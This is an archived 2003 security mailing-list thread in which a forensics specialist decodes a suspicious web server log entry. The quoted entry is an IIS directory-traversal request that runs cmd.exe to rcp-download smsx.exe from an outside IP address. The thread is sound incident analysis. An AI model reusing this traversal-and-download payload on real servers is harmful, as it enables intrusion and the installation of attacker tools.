Security Incidents mailing list archives
RE: smsx.exe?
From: "Altheide, Cory B." <AltheideC () nv doe gov>
Date: Mon, 5 May 2003 17:25:32 -0700
No, adm is the user, at least according to the rcp usage instructions.
H:\>rcp
Copies files to and from computer running the RCP service.
RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:] path\destination
-a Specifies ASCII transfer mode. This mode converts
the EOL characters to a carriage return for UNIX
and a carriage
return/line feed for personal computers. This is
the default transfer mode.
-b Specifies binary image transfer mode.
-h Transfers hidden files.
-r Copies the contents of all subdirectories;
destination must be a directory.
host Specifies the local or remote host. If host is
specified as an IP address OR if host name contains
dots, you must specify the user.
.user: Specifies a user name to use, rather than the
current user name.
source Specifes the files to copy.
path\destination Specifies the path relative to the logon directory
on the remote host. Use the escape characters
(\ , ", or ') in remote paths to use wildcard
characters on the remote host.
"rcp -b 195.92.252.138.adm:smsx.exe ."
RCP smsx.exe from 195.92.252.138 to . (here) as user adm.
Your windows guy should have tried typing the command with no arguments...
;-P
Cory Altheide
Computer Forensics Specialist
NCI Information Systems, Inc.
NNSA Cyber Forensics Center
altheidec () nv doe gov
-----Original Message----- From: Steve Bromwich [mailto:incident () fop ns ca] Sent: Monday, May 05, 2003 10:30 AM To: incidents () securityfocus com Subject: smsx.exe? Hi, Has anyone seen a request like this in their logs? 205.247.193.56 - - [05/May/2003:11:59:52 -0300] "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.9
2.252.138.adm:smsx.exe+."
I tried rcping smsx.exe off the remote site but no joy; is the .adm an obscure windows-specific port address or something? One of our windows guys said the smsx was "remote management software", but had no idea about the .adm... On a side note, the response I got from energis (the 195.92.252.138 owner) had the following at the start: PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG Further down: Please note that if one of our IP addresses looks up to a 'webcache' (as opposed to a modem) we have a *maximum* of 30 hours to trace the user responsible for the abuse. So I guess this means that Energis users have a pretty good chance of abusing remote servers through Energis' web cache and getting away with it :-/ Cheers, Steve -------------------------------------------------------------- -------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents -------------------------------------------------------------- --------------
---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
Current thread:
- smsx.exe? Steve Bromwich (May 05)
- Re: smsx.exe? Michael J McCafferty (May 06)
- <Possible follow-ups>
- RE: smsx.exe? Altheide, Cory B. (May 05)
- Re: smsx.exe? eden.akhavi (May 12)